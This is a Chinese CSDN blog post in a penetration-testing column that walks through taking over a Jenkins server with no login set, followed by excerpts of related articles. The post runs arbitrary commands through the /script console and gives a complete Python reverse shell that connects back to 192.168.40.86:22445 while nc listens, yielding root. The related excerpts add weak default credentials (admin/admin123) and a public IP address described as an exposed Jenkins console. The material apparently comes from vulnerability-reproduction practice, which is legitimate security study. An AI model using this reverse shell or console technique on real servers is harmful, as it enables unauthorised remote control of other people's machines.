利用jenkins未授权漏洞获取主机权限

最新推荐文章于 2024-07-27 13:25:11 发布
最新推荐文章于 2024-07-27 13:25:11 发布
阅读量474 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: jenkins
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guo15890025019/article/details/117032880
版权

目录

一、背景

Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。

二、漏洞原因

jenkins 未设置帐号密码,或者使用了弱帐号密码

三、漏洞复现

1、访问http://192.168.10.27:1234/script,发现不需要登录就可以访问。
在这里插入图片描述2、输入命令执行,发现可以执行任意命令
println "whoami".execute().text
在这里插入图片描述
3、用python编写反弹式shell脚本(test.py)。

#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.40.86",22445));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

将test.py上传到网络文件服务器上
在这里插入图片描述
4、上传test.py到目标服务器的/tmp目录下
在这里插入图片描述
5、通过jenkis执行test.py脚本,同时在192.168.40.86上执行nc监听。
在这里插入图片描述在这里插入图片描述
6、成功获取目标主机root权限
在这里插入图片描述

Passer798
关注
专栏目录
Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353)
墨痕诉清风的博客
11-06 841
(https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar),这是生成POC的工具。下载[exploit.py](https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py)参考阅读 https://blogs.securiteam.com/index.php/archives/3171。.
二十八种授权访问漏洞合集(暂时最全)
墨痕诉清风的博客
01-04 4751
目录 0x01 授权漏洞预览 0x02 Active MQ 授权访问 0x03 Atlassian Crowd 授权访问 0x04 CouchDB 授权访问 0x05 Docker 授权访问 0x06 Dubbo 授权访问 0x07 Druid 授权访问 0x08 Elasticsearch 授权访问 0x09 FTP 授权访问 0x10 HadoopYARN 授权访问 0x11 JBoss 授权访问 0x12 Jenkins 授权访问 0x13 Jupyt
jenkins授权访问漏洞
WY92139010的博客
08-04 1240
jenkins授权访问漏洞 一、漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建 1、官方下载jenkins-1.620-1.1.noarch.rpm,下载地址:http://mirrors.jenkins.io 2、在redhat...
【渗透测试】Jenkins远程命令执行漏洞(CVE-2018-1000861)
最新发布
网络安全从业者的学习笔记
07-27 475
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用利用链。其中最严重的就是绕过Groovy沙盒导致授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1838
Jenkins授权访问漏洞
Jenkins授权访问漏洞&命令执行
qq_45434762的博客
03-28 9344
Jenkins授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
漏洞学习——授权访问】慧聪网Jenkins系统授权访问
Fly_鹏程万里
02-22 939
漏洞细节 http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动) http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统) http://58.252.73.136:8080(jenkins管理后台,免密码访问) http://58.252.73.136:8080/script下执行cmd命令 println "ipconfi...
授权访问漏洞总结
墨鱼菜鸡
07-28 318
目录 一、MongoDB 授权访问漏洞 二、Redis 授权访问漏洞 三、Memcached 授权访问漏洞CVE-2013-7239 四、JBOSS 授权访问漏洞 五、VNC 授权访问漏洞 六、Docker 授权访问漏洞 七、ZooKeeper 授权访问漏洞 八、Rsync ...
授权访问漏洞
snowy_y的博客
06-23 919
授权访问
授权访问漏洞笔记
m0_47599604的博客
04-05 1621
授权访问 介绍 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 B/S架构中 一般存在后台界面中,访问特定目录下的敏感文件,能直接跳过管理员登录,去访问后台管理内容。 C/S架构中 一般存在默认安装的一些客户端应用程序中,安装人员因缺少安全意识导致攻击者利用。 数据库...
XXL-JOB executor 授权访问漏洞复现
m0_53603468的博客
12-25 2872
概述 XXL-JOB executor 授权访问漏洞 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,授权的攻击者可以通过RESTful API执行任意命令。 不过XXL-JOB官方版本原生自带了鉴权组件,开启后可保障系统底层通讯安全。因此,正常情况下调度中心与执行器底层通讯是安全
jenkins 授权访问-任意命令执行
weixin_33841503的博客
08-09 751
jenkins 授权访问-任意命令执行 0x00 jenkins简介 enkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。 0x01 漏洞原因 jenkins 设置帐号密码,或者使用了弱帐号密码 0x02 漏洞复现 在默认...
利用Jenkins授权获取服务器权限--Docker还来干扰--一次渗透的经历
weixin_30270889的博客
08-13 625
Jenkins获取权限的过程 Jenkins存在授权访问漏洞 Jenkins存在授权访问漏洞,且项目具有读取权限,通过项目的日志获取到一个账号密码,尝试登录成功,打开控制台成功。 备注:控制台一般可以进去后直接URL输入http://a.b.c.d/script 即可进入 执行命令尝试反弹shell 在对话框中尝试反弹shell,本地NC监听中,发行不行,尝试ping回来,发现网...
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 2911
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
JARBAS - Jenkins渗透原理详解
2301_82000839的博客
05-31 844
打靶正常的思路,先nmap扫,tcp、udp全扫一遍,防止漏掉信息80优先思路、22ssh爆破放最后普通扫目录无信息、根据网站信息猜测、再指定扫描测试对编码进行hash-id识别、解码、利用信息尝试登录要么是ssh登录、要么是8080的登录;进行尝试进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限写入poc;5分钟自动进入了root权限
TRY HACK ME |Alfred「利用Jenkins配置错误提权」
AKAHRZ的博客
04-16 459
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Alfred「利用Jenkins配置错误提权」THM靶场:AlfredTASK1 谁是最佳员工?TASK2 获得初始 shellTASK3 权限提升TASK4 不.
Jenkins任意文件读取漏洞(CVE-2018-1999002)
公众号shadow sock7
07-28 3140
在 Windows 下,不存在的目录可以通过 ../ 遍历过去的,而对于 Linux 则不行。那么这个漏洞在 Windows 下是可以任意文件读取的,而在 Linux 下则需要在 Jenkins plugins 目录下存在一个名字中存在 _ 的目录才可以。 感觉比较鸡肋,谁会没事在Jenkins plugins 目录下建一个_的目录? 参考 https://xz.aliyun.com...
windows jenkins获取管理员权限或本地用户权限
字节叔叔
02-07 2106
有个前端项目要使用taro,编译的时候报找不到,明明在jenkins的服务器上面已经装了,猜测可能是用户不对,结合之前git也有一些用户的问题,使用命令或者某些插件的时候经常出现权限错误的情况,在此分享一下解决办法。
红队攻防渗透技术实战流程:中间件安全:Jetty&Jenkins&Weblogic&WPS
HACKONE的博客
06-15 345
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作。漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn。增加解析clientweb.docer.wps.cn.{xxxxx}wps.cn ip上面。Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。WPS Office 代码执行(QVD-2023-17241)实战中:申请{xxxxx}wps.cn域名。-修改docx中的指向连接URL。
常见IT系统授权漏洞风险与Redis示例
本文主要探讨了多个常见的授权访问漏洞,涉及的IT服务和组件包括Redis、MongoDB、Jenkins、Memcached、JBOSS、VNC、Docker、ZooKeeper、Rsync、Atlassian Crowd、CouchDB、Elasticsearch和Hadoop。这些漏洞的共同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值